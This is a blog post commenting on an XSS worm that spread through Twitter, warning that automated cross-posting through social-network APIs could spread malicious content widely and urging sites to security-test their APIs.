Collaborating automatically via Web 2.0 APIs is a beautiful thing. I can update status on Twitter and it will automagically propagate to any twitter_logo number of social networking sites: Facebook. FriendFeed. MySpace. LinkedIn. If I had to do it all manually, I wouldn’t. But the automation of sharing, i.e. collaboration, between Web 2.0 social networking sites made possible by open APIs is just too easy to pass up.

The danger is, of course, that a single malicious message can just as quickly propagate through that same social network. The power of the API can quickly be turned against us.


I had been considering this very possibility, discussing it with Don, and this morning discovered that someone has already begun to figure out how to twist APIs to do their malicious bidding. Over the weekend, an XSS-based worm began making its way through Twitter.

Earlier today we were informed of a malicious site that was spreading links to on Twitter without user consent via a cross-site scripting vulnerability. We’ve taken steps to remove the offending updates, and to close the holes that allowed this “worm” to spread.

No passwords, phone numbers, or other sensitive information were compromised as part of this attack. [emphasis added]

Twitter’s blog states that the worm is “similar to the famous Samy worm which spread across the popular MySpace social-networking site a while back.” This particular worm appears to be confined to Twitter. For the nonce, that is. The worm was spread via accounts created specifically to do just that, so the damage should be (hopefully) somewhat contained. Twitter notes that “about 90 accounts were compromised” which is a tiny fraction of the millions of account it could have possibly compromised.

Yet another good reason not to auto-follow new accounts, isn’t it?

What should be frightening to Twitter – and you – and what alarms me is that the exploitation of the collaborative nature of social networking and Web 2.0 sites seems an obvious path to profit for miscreants. You are only as secure as the weakest chain in the link, and this has never been more true than it is in the Web 2.0 world. If Twitter is insecure, and it obviously was, and I can insert into my updates malicious code, then if those updates are automatically shared with other sites – Facebook, FriendFeed, MySpace, etc… – it is possible that that malicious code will be shared with all of those sites, as well.

Worse, it is not only shared with my accounts, but with everyone subscribed to my profiles and updates and all the sites they share that information with, automatically. It is an exponential growth pattern, with sharing increasing from one connection to the other, until a single malicious message has managed to make its way through millions of users. Automatically. And they are automatic; leveraging the power of APIs and the nature of human beings: we’re lazy. That’s not a bad thing, I’m as lazy as the next person when it comes to sharing information and if there’s a way to automate the process (and there is) I will. But that same automation is as dangerous as the secret tunnels under the ancient castle connecting to other buildings, rooms, and outside the walls. They can be used by both those intent on good – and bad.

It appears to be, from here, an attack surface of exponentially growing potential. It could be the single largest existing botnet in history. And if that doesn’t scare you, I don’t know what will.


It behooves Twitter, and other well-known (and not so well-known) social networking sites to test, test, and test again not only their web interfaces, but their APIs. Twitter is not saying how the worm was spreading (via API or the web, or both), but given the ease with which automation can be used to automate finding and following new folks via third-party providers, and the extensive use of other third-party Web 2.0 sites to auto-follow those who follow you…I’m guessing the API was an integral part of this attack. And if it wasn’t, it will be the next time – or the next time.

This worm was “malicious” but in the same way the (very old now) Cookie virus was malicious. It didn’t destroy anything, or share any personal information.

Currently, there isn’t any signs that this worm will do any damages other than posting nuisance message on your twitter account. Nevertheless, you should remove it once you suspect that you caught the worm.

And maybe that’s a good thing, because holes have now been closed that could have allowed malicious content of a nefarious nature to propagate automatically through Twitter – and beyond. Just because this worm didn’t fully exploit the connected nature of Web 2.0 and social networking doesn’t mean the next one won’t.

And when someone does finally decide that the ability to potentially leverage – automatically – the connectedness of Web 2.0 and the tendency of sites not to test and retest their APIs and sites for possible vulnerabilities it’s going to be a spectacular display of ugliness. And outrage.


The potential good that comes from collaboration generally outweighs the potential risks – and the costs to mitigate them. This is the same argument used to dismiss or at least downplay the dangers of a shared environment within cloud computing. failed-security

But when you share resources or data – especially data – then you are sharing all the risks that go along with it. And even if you’ve taken the appropriate steps to secure your site or API does not mean that someone connected via a shared connection has done so. The assumption that data transferred via third-parties to and from your data via APIs is trusted is a bad one.


If you haven’t thoroughly tested the security posture of your web application or APIs – you need to do it now. If that means a thorough code   review from a security perspective – that’s what it means. If you aren’t certain your developers will find all the possible holes (there are tons of them, after all) then get thyself to OWASP or a service like White Hat Sentinel, and find them. If you prefer a web application firewall, get one and deploy it. Consider virtual patching as a stop gap measure to ensure a positive security posture now, while you seek out and destroy any possible holes in your applications.

No Web 2.0 application is an island, at least not one worth using today. It’s connected, it’s collaborating, and it’s doing so automatically – via APIs. If you aren’t testing those APIs as thoroughly as you are the web interface, you are full of FAIL.

Follow me on Twitter View Lori's profile on SlideShare friendfeedicon_facebook AddThis Feed Button Bookmark and Share